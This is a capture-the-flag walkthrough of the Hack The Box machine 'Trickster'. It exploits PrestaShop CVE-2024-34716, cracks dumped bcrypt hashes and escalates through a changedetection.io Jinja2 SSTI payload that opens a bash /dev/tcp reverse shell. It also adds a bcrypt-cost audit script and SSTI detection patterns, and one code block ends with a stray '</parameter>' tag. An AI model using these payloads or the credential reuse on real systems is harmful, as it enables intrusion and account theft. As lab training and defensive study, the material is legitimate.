Hack The Box / LINUX / 2026-03-27
Hack The Box - Trickster (Linux)
Initial foothold through PrestaShop CVE-2024-34716, credential extraction from the database, pivot to the james user, then root via changedetection.io SSTI inside a Docker container and a reused root password.
Target
- IP: 10.129.114.173
Recon
sudo nmap -sC -sV 10.129.114.173 -p- -T5 -v
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 8c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA)
|_ 256 90:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519)
80/tcp open http Apache httpd 2.4.52
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://trickster.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
1235/tcp filtered mosaicsyssvc1
2861/tcp filtered dialpad-voice2
3103/tcp filtered autocuesmi
5410/tcp filtered salient-usrmgr
6177/tcp filtered unknown
11750/tcp filtered unknown
13255/tcp filtered unknown
15594/tcp filtered unknown
17076/tcp filtered unknown
17949/tcp filtered unknown
18558/tcp filtered unknown
18726/tcp filtered unknown
19296/tcp filtered unknown
20211/tcp filtered unknown
20490/tcp filtered unknown
26843/tcp filtered unknown
28277/tcp filtered unknown
30357/tcp filtered unknown
31000/tcp filtered unknown
32172/tcp filtered unknown
35236/tcp filtered unknown
37057/tcp filtered unknown
38792/tcp filtered unknown
39120/tcp filtered unknown
39359/tcp filtered unknown
43455/tcp filtered unknown
43794/tcp filtered unknown
45995/tcp filtered unknown
53039/tcp filtered unknown
54123/tcp filtered unknown
54648/tcp filtered unknown
55139/tcp filtered unknown
57011/tcp filtered unknown
58468/tcp filtered unknown
58889/tcp filtered unknown
59386/tcp filtered unknown
62087/tcp filtered unknown
64807/tcp filtered unknown
65118/tcp filtered unknown
Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Add trickster.htb to /etc/hosts.
Go to http://trickster.htb/.
There is a link to http://shop.trickster.htb.
Add shop.trickster.htb to /etc/hosts.
Go to http://shop.trickster.htb/.
It is a PrestaShop site.
Register a user.
http://shop.trickster.htb/INSTALL.txt
We see:
===== Installation instructions for PrestaShop 8 =====
There is a vulnerability in PrestaShop 8 (CVE-2024-34716):
- https://security.snyk.io/vuln/SNYK-PHP-PRESTASHOPPRESTASHOP-6846214
- CVE-2024-34716
There is also a PoC for this CVE:
- https://github.com/aelmokhtar/CVE-2024-34716
Go to the Contact Us page. We see the admin email:
admin@trickster.htb
ffuf -u 'http://shop.trickster.htb/FUZZ' -w /home/kali/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50 -fc 403
.git [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 121ms]
Go to http://shop.trickster.htb/.git/.
The .git directory is exposed.
Download git-dumper:
- https://github.com/arthaud/git-dumper
mkdir prestashop
python3 git_dumper.py http://shop.trickster.htb/ prestashop
cd prestashop
ls
We notice the admin folder:
admin634ewutrx1jgitlooaj
git clone https://github.com/aelmokhtar/CVE-2024-34716.git
cd CVE-2024-34716
Edit exploit.html so it uses the correct admin folder name, and edit the listener IP in reverse_shell.php inside the zip file.
python3 exploit.py 'http://shop.trickster.htb' 'admin@trickster.htb' 'a' exploit.html
Start listener:
nc -vlnp 1234
We get a reverse shell as www-data.
Database Loot
cd
cd prestashop
cat app/config/parameters.php
'database_host' => '127.0.0.1',
'database_port' => '',
'database_name' => 'prestashop',
'database_user' => 'ps_user',
'database_password' => 'prest@shop_o',
'database_prefix' => 'ps_',
'database_engine' => 'InnoDB',
'secret' => 'eHPDO7bBZPjXWbv3oSLIpkn5XxPvcvzt7ibaHTgWhTBM3e7S9kbeB1TPemtIgzog',
'cookie_key' => '8PR6s1SJZLPCjXTegH7fXttSAXbG2h6wfCD3cLk5GpvkGAZ4K9hMXpxBxrf7s42i',
'cookie_iv' => 'fQoIWUoOLU0hiM2VmI1KPY61DtUsUx8g',
'new_cookie_key' => 'def000001a30bb7f2f22b0a7790f2268f8c634898e0e1d32444c3a03f4040bd5e8cb44bdb57a73f70e01cf83a38ec5d2ddc1741476e83c45f97f763e7491cc5e002aff47',
mysql -u ps_user -h 127.0.0.1 -p
Enter password prest@shop_o.
use prestashop
select * from ps_customer;
MariaDB [prestashop]> select * from ps_customer;
+-------------+---------------+---------+-----------+------------------+---------+---------+---------+-------+------+-----------+-----------+----------------------+--------------------------------------------------------------+---------------------+------------+------------+----------------------------+---------------------+-------+---------+--------------------------+--------------------+------------------+----------------------------------+------+--------+----------+---------+---------------------+---------------------+----------------------+-------------------------+
| id_customer | id_shop_group | id_shop | id_gender | id_default_group | id_lang | id_risk | company | siret | ape | firstname | lastname | email | passwd | last_passwd_gen | birthday | newsletter | ip_registration_newsletter | newsletter_date_add | optin | website | outstanding_allow_amount | show_public_prices | max_payment_days | secure_key | note | active | is_guest | deleted | date_add | date_upd | reset_password_token | reset_password_validity |
+-------------+---------------+---------+-----------+------------------+---------+---------+---------+-------+------+-----------+-----------+----------------------+--------------------------------------------------------------+---------------------+------------+------------+----------------------------+---------------------+-------+---------+--------------------------+--------------------+------------------+----------------------------------+------+--------+----------+---------+---------------------+---------------------+----------------------+-------------------------+
| 1 | 1 | 1 | 1 | 3 | 1 | 0 | | | | Anonymous | Anonymous | anonymous@psgdpr.com | $2y$10$054Mo38DcRSLaMX9OhT5UuhYSQvorGu8nZb9GubbAv3Roei6RS2QW | 2024-05-25 13:10:24 | 0000-00-00 | 0 | | 0000-00-00 00:00:00 | 0 | | 0.000000 | 0 | 0 | d12c0c01f2ebcc375cf85eaa3121be52 | | 0 | 0 | 0 | 2024-05-25 19:10:24 | 2024-05-25 19:10:24 | | 0000-00-00 00:00:00 |
| 2 | 1 | 1 | 1 | 3 | 1 | 0 | | | | John | DOE | pub@prestashop.com | $2y$10$Cw68h0u8YeP6IiYRRaOjQu4AV7X9BTQL3ZK4CtHU16PNDg7LB4mEG | 2024-05-25 13:12:00 | 1970-01-15 | 1 | | 2013-12-13 08:19:15 | 1 | | 0.000000 | 0 | 0 | bbab8bd6e54759aea215bd9a4e00a079 | | 1 | 0 | 0 | 2024-05-25 19:12:00 | 2024-05-25 19:12:00 | | 0000-00-00 00:00:00 |
| 4 | 1 | 1 | 1 | 3 | 1 | 0 | NULL | NULL | NULL | adam | adam | adam@trickster.htb | $2y$10$kY2G39RBz9P0S48EuSobuOJba/HgmQ7ZtajfZZ3plVLWnaBbS4gei | 2024-05-25 09:19:39 | 1990-09-19 | 0 | NULL | 0000-00-00 00:00:00 | 0 | NULL | 0.000000 | 0 | 0 | f02f94a3226a0eca87419815a9d7cf24 | NULL | 1 | 0 | 0 | 2024-05-25 15:19:39 | 2024-05-25 15:19:39 | NULL | 0000-00-00 00:00:00 |
| 5 | 1 | 1 | 1 | 3 | 1 | 0 | | | | test | test | test@test.com | $2y$10$U6671G6fYPhaAnN32fKwiun9beoY4u44vTBjYDju5f/ZTZ5r17EJ. | 2024-09-22 21:49:56 | 0000-00-00 | 0 | | 0000-00-00 00:00:00 | 0 | | 0.000000 | 0 | 0 | 5fe8da9d196f59eb9259624dfa7d796f | | 1 | 0 | 0 | 2024-09-23 03:49:56 | 2024-09-23 03:49:56 | | 0000-00-00 00:00:00 |
+-------------+---------------+---------+-----------+------------------+---------+---------+---------+-------+------+-----------+-----------+----------------------+--------------------------------------------------------------+---------------------+------------+------------+----------------------------+---------------------+-------+---------+--------------------------+--------------------+------------------+----------------------------------+------+--------+----------+---------+---------------------+---------------------+----------------------+-------------------------+
4 rows in set (0.001 sec)
Adam's hash is not crackable.
select * from ps_employee;
+-------------+------------+---------+----------+-----------+---------------------+--------------------------------------------------------------+---------------------+-----------------+---------------+--------------------+------------------+----------------------+----------------------+----------+----------+-----------+-------------+----------+---------+--------+-------+---------------+--------------------------+------------------+----------------------+----------------------+-------------------------+----------------------+
| id_employee | id_profile | id_lang | lastname | firstname | email | passwd | last_passwd_gen | stats_date_from | stats_date_to | stats_compare_from | stats_compare_to | stats_compare_option | preselect_date_range | bo_color | bo_theme | bo_css | default_tab | bo_width | bo_menu | active | optin | id_last_order | id_last_customer_message | id_last_customer | last_connection_date | reset_password_token | reset_password_validity | has_enabled_gravatar |
+-------------+------------+---------+----------+-----------+---------------------+--------------------------------------------------------------+---------------------+-----------------+---------------+--------------------+------------------+----------------------+----------------------+----------+----------+-----------+-------------+----------+---------+--------+-------+---------------+--------------------------+------------------+----------------------+----------------------+-------------------------+----------------------+
| 1 | 1 | 1 | Store | Trickster | admin@trickster.htb | $2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C | 2024-05-25 13:10:20 | 2024-04-25 | 2024-05-25 | 0000-00-00 | 0000-00-00 | 1 | NULL | NULL | default | theme.css | 1 | 0 | 1 | 1 | NULL | 5 | 0 | 0 | 2024-09-23 | NULL | 0000-00-00 00:00:00 | 0 |
| 2 | 2 | 0 | james | james | james@trickster.htb | $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm | 2024-09-09 13:22:42 | NULL | NULL | NULL | NULL | 1 | NULL | NULL | NULL | NULL | 0 | 0 | 1 | 0 | NULL | 0 | 0 | 0 | NULL | NULL | NULL | 0 |
+-------------+------------+---------+----------+-----------+---------------------+--------------------------------------------------------------+---------------------+-----------------+---------------+--------------------+------------------+----------------------+----------------------+----------+----------+-----------+-------------+----------+---------+--------+-------+---------------+--------------------------+------------------+----------------------+----------------------+-------------------------+----------------------+
Put james's hash in a file named hash.
hashcat -a 0 -m 3200 ./hash ./rockyou.txt
We get password: alwaysandforever
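Why james's hash falls to rockyou quickly while adam's does not is visible in the hash strings themselves: the rows PrestaShop generated use $2y$10$ (bcrypt cost 10, 1024 key-setup rounds), while the james row is $2a$04$, cost 4, the lowest bcrypt allows and 64 times cheaper per guess. The following Python audit is an added example, not part of the original walkthrough: it parses the bcrypt strings dumped above and flags accounts whose cost factor is below a threshold. The threshold of 10 is an assumption based on common guidance, and the hash values are copied from the ps_customer and ps_employee tables above.

```python
import re
from typing import Dict, List, Tuple

# bcrypt modular-crypt string: $2a$/$2b$/$2y$, a two-digit cost, then 22 salt + 31 hash
# characters from the bcrypt base64 alphabet (./A-Za-z0-9).
BCRYPT_RE = re.compile(r"^\$(2[aby])\$(\d{2})\$([./A-Za-z0-9]{53})$")

# Cost factor below which an account is flagged. bcrypt allows 4..31; 10 is an assumed
# baseline for this audit, not a value taken from the walkthrough.
MIN_COST = 10

# Hash values copied from the ps_customer / ps_employee dumps above.
DUMPED_HASHES: Dict[str, str] = {
    "anonymous@psgdpr.com": "$2y$10$054Mo38DcRSLaMX9OhT5UuhYSQvorGu8nZb9GubbAv3Roei6RS2QW",
    "pub@prestashop.com":   "$2y$10$Cw68h0u8YeP6IiYRRaOjQu4AV7X9BTQL3ZK4CtHU16PNDg7LB4mEG",
    "adam@trickster.htb":   "$2y$10$kY2G39RBz9P0S48EuSobuOJba/HgmQ7ZtajfZZ3plVLWnaBbS4gei",
    "admin@trickster.htb":  "$2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C",
    "james@trickster.htb":  "$2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm",
}


def parse_bcrypt(hash_str: str) -> Tuple[str, int]:
    """Return (variant, cost) for a bcrypt string, or raise ValueError if it is not one."""
    m = BCRYPT_RE.match(hash_str)
    if m is None:
        raise ValueError("not a bcrypt hash")
    variant, cost = m.group(1), int(m.group(2))
    if not 4 <= cost <= 31:
        raise ValueError(f"bcrypt cost {cost} outside the valid range 4..31")
    return variant, cost


def rounds(cost: int) -> int:
    """Key-setup iterations implied by a cost factor: 2**cost."""
    return 1 << cost


def work_ratio(cost_a: int, cost_b: int) -> int:
    """How many times more work one guess costs at cost_b than at cost_a (cost_b >= cost_a)."""
    return rounds(cost_b) // rounds(cost_a)


def audit(hashes: Dict[str, str], min_cost: int = MIN_COST) -> List[dict]:
    """Flag accounts whose hash is malformed or whose bcrypt cost is below min_cost."""
    findings: List[dict] = []
    for account, h in hashes.items():
        try:
            variant, cost = parse_bcrypt(h)
        except ValueError as exc:
            # Non-bcrypt values (legacy MD5, plaintext, empty) are findings in their own right.
            findings.append({"account": account, "cost": None, "problem": str(exc)})
            continue
        if cost < min_cost:
            findings.append({
                "account": account,
                "cost": cost,
                "variant": variant,
                "problem": (f"cost {cost} ({rounds(cost)} rounds) is "
                            f"{work_ratio(cost, min_cost)}x cheaper per guess than cost {min_cost}"),
            })
    return findings


if __name__ == "__main__":
    for finding in audit(DUMPED_HASHES):
        print(f"{finding['account']}: {finding['problem']}")
</parameter>

Run over an exported password table this is the check that would have surfaced the james account before hashcat did. The variant prefix is a second signal: PHP's password_hash, which PrestaShop uses, writes $2y$ strings, so a $2a$ row with the minimum cost was most likely written by something other than the application's usual password code path.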
ssh james@trickster.htb
Enter the recovered password.
Privilege Escalation
Docker is installed but this user is not in the docker group, so we cannot run docker commands directly. We can still check whether a container is running on the bridge network and has a listening service.
ping 172.17.0.2
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.080 ms
A container is running.
curl http://172.17.0.2/
curl: (7) Failed to connect to 172.17.0.2 port 80 after 0 ms: Connection refused
We can scan for open ports. See script in attachments:
- attachments/brute_ports.py
python3 attachments/brute_ports.py
Port 5000 is open.
Download chisel and upload it to the victim:
- https://github.com/jpillora/chisel
On attacker:
./chisel server --port 8000 --reverse
On victim:
./chisel client http://10.10.16.29:8000 R:127.0.0.1:5000:172.17.0.2:5000
Go to http://127.0.0.1:5000/.
It is changedetection.io 0.45.20.
Log in with the password alwaysandforever (reused from the james account).
This version is vulnerable to CVE-2024-32651, a server-side template injection in notification bodies; exploit details:
- https://blog.hacktivesecurity.com/index.php/2024/05/08/cve-2024-32651-server-side-template-injection-changedetection-io/
Add a new URL:
http://10.10.16.29/test
Go to Notifications tab. In notification body, insert:
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "bash -i >& /dev/tcp/10.10.16.29/4444 0>&1" > /dev/shm/rev').read() }}
Start listener:
nc -vlnp 4444
Change notification body to:
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash /dev/shm/rev').read() }}
Click Send test notification. We get a reverse shell as root inside the Docker container.
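Added detection example, not from the original writeup or the changedetection.io project: notification bodies are user-supplied text that the application rendered as a Jinja2 template, which is what CVE-2024-32651 abuses. A defender reviewing exported watch configurations, or the request log of the notification endpoint, can flag bodies that combine a template expression with Python introspection or process-execution primitives. The indicator list and the sample bodies are constructed for this example; the two payload samples are the ones shown above, and the benign body assumes changedetection.io's {{watch_url}} style placeholders.

```python
import re
from typing import Dict, List, Tuple

# Indicator patterns for Jinja2 sandbox-escape attempts in user-supplied template text.
# Constructed for this example; extend to match the primitives your own stack exposes.
SSTI_INDICATORS: List[Tuple[str, re.Pattern]] = [
    # Any template expression or statement block. Normal on its own: placeholders are legitimate.
    ("jinja_expression", re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)),
    # Walking Python internals from an object: self.__init__.__globals__ and similar.
    ("dunder_attribute", re.compile(r"__(?:class|mro|subclasses|globals|builtins|import|init)__")),
    # Importing os directly or reaching its exec helpers.
    ("os_import", re.compile(r"__import__\s*\(\s*['\"]os['\"]\s*\)|\bos\.(?:popen|system)\b")),
    # Process execution calls.
    ("shell_exec", re.compile(r"\b(?:popen|subprocess|system)\s*\(")),
    # Bash reverse-shell plumbing.
    ("reverse_shell_redirect", re.compile(r"/dev/tcp/|>&\s*/dev/|0>&1")),
]

# Indicators that escalate a body from "uses templates" to "suspicious".
ESCALATING = {"dunder_attribute", "os_import", "shell_exec", "reverse_shell_redirect"}

# Constructed sample bodies: one benign placeholder body, two copied from the payloads above.
SAMPLE_BODIES: Dict[str, str] = {
    "benign": "Change detected on {{watch_url}}\n{{diff}}",
    "payload_stage": "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo \"bash -i >& /dev/tcp/10.10.16.29/4444 0>&1\" > /dev/shm/rev').read() }}",
    "payload_trigger": "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash /dev/shm/rev').read() }}",
}


def score_body(body: str) -> Dict[str, List[str]]:
    """Map each indicator name to the substrings it matched in body (only indicators that hit)."""
    hits: Dict[str, List[str]] = {}
    for name, pattern in SSTI_INDICATORS:
        found = pattern.findall(body)
        if found:
            hits[name] = found
    return hits


def is_suspicious(body: str) -> bool:
    """True when the body contains at least one escalating indicator."""
    return bool(ESCALATING.intersection(score_body(body)))


def triage(bodies: Dict[str, str]) -> Dict[str, bool]:
    """Classify a batch of notification bodies, e.g. from an exported watch list."""
    return {name: is_suspicious(body) for name, body in bodies.items()}


if __name__ == "__main__":
    for sample_name, sample_body in SAMPLE_BODIES.items():
        verdict = "SUSPICIOUS" if is_suspicious(sample_body) else "ok"
        print(f"{sample_name}: {verdict} {sorted(score_body(sample_body))}")
```

The regex triage is for finding abuse already sitting in stored bodies or logs; it is not a fix. The application-side fix is to render untrusted templates in a restricted environment: Jinja2's SandboxedEnvironment refuses attribute access to names starting with an underscore, which stops the self.__init__.__globals__ walk used above regardless of how the payload is spelled.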
cd
cat .bash_history
We notice a candidate password:
#YouC4ntCatchMe#
Return to the james shell:
su root
Enter the password found in the container's bash history. We are root.